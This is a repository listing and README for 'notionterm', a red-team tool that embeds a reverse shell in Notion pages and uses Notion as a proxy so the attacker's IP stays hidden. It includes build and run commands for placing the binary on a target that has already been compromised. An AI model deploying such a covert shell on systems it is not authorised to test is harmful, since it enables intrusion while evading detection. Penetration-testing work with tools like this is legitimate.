https://github.com/ariary/notionterm

🖥️📖 Embed reverse shell in Notion pages
https://github.com/ariary/notionterm

c2c infosec notion notion-api pentest pentest-tool redteam reverse-shell webshell

Last synced: about 1 month ago
JSON representation

🖥️📖 Embed reverse shell in Notion pages

• Host: GitHub
• URL: https://github.com/ariary/notionterm
• Owner: ariary
• License: unlicense
• Created: 2022-05-11T13:53:21.000Z (about 2 years ago)
• Default Branch: main
• Last Pushed: 2023-03-07T15:39:03.000Z (over 1 year ago)
• Last Synced: 2024-04-17T16:09:35.105Z (2 months ago)
• Topics: c2c, infosec, notion, notion-api, pentest, pentest-tool, redteam, reverse-shell, webshell
• Language: Go
• Homepage:
• Size: 8.13 MB
• Stars: 121
• Watchers: 3
• Forks: 13
• Open Issues: 3
• Metadata Files:
  • Readme: README.md
  • License: LICENSE

Lists

• awesome-notion - notionterm - Embed a shell in Notion pages. (Tools)

README

        




  notionterm 



  

  

   Embed reverse shell in Notion pages.


  Hack while taking notes






---

![demo](https://github.com/ariary/notionterm/blob/main/img/demo_dark_light.gif)

---



FOR ➕:



  
Hiding attacker IP in reverse shell (No direct interaction between attacker and target machine. Notion is used as a proxy hosting the reverse shell)



  
Demo/Quick proof insertion within report

  
High available and shareable reverse shell (desktop, browser, mobile)

  
Encrypted and authenticated remote shell

 





NOT FOR ➖:



  
Long and interactive shell session (see tacos for that)





---



Why? 🤔 

The focus was on making something fun while still being usable, but that's not meant to be THE solution for reverse shell in the pentester's arsenal





How?  🤷‍♂️

Just use notion as usual and launch notionterm on target.





Requirements 🖊️

 


  
Notion software and API key

  
Allowed HTTP communication from the target to the notion domain

  
Prior RCE on target

 



---



roughly inspired by the great idea of OffensiveNotion and notionion! 



## TL;DR

Learn command and flags is too boring: **Use `wrap-notionterm.sh`**

## Quickstart

### 🏗️ Set-up

1. Create a page and give to the integration API key the permissions to have page write access

2. Build `notionterm` and transfer it on target machine (see [Build](#build))

### 👟 Run

There are 3 main ways to run `notionterm`:

  "normal" mode
Get terminal, stop/unstop it, etc...



notionterm [flags]




Start the shell with the button widget: turn ON, do you reverse shell stuff, turn OFF to pause, turn ON to resume etc...

  "server" mode
Ease notionterm embedding in any page



notionterm --server [flags]




Start a shell session in any page by creating an embed block with URL containing the page id (CTRL+Lto get it): https://[TARGET_URL]/notionterm?url=[NOTION_PAGE_ID].

  light mode
Only perform HTTP traffic from target → notion



notionterm light [flags]



## Build

As `notionterm` is aimed to be run on target machine it must be built to fit with it.

Thus set env var to fit with the target requirement:

```shell

GOOS=[windows/linux/darwin]

```

### Simple build

```shell

git clone https://github.com/ariary/notionterm.git && cd notionterm

GOOS=$GOOS go build notionterm.go

```

You will need to set API key and notion page URL using either env var (`NOTION_TOKEN` & `NOTION_PAGE_URL`) or flags (`--token` & `--page-url`)

### "All-inclusive" build

Embed directly the notion integration API token and notion page url in the binary. *⚠️ everybody with access to the binary can retrieved the token. For security reason don't share it and remove it after use.*

Set according env var:

```shell

export NOTION_PAGE_URL=[NOTION_PAGE_URL]

export NOTION_TOKEN=[INTEGRATION_NOTION_TOKEN]

```

And build it:

```

git clone https://github.com/ariary/notionterm.git && cd notionterm

./static-build.sh $NOTION_PAGE_URL $NOTION_TOKEN $GOOS

```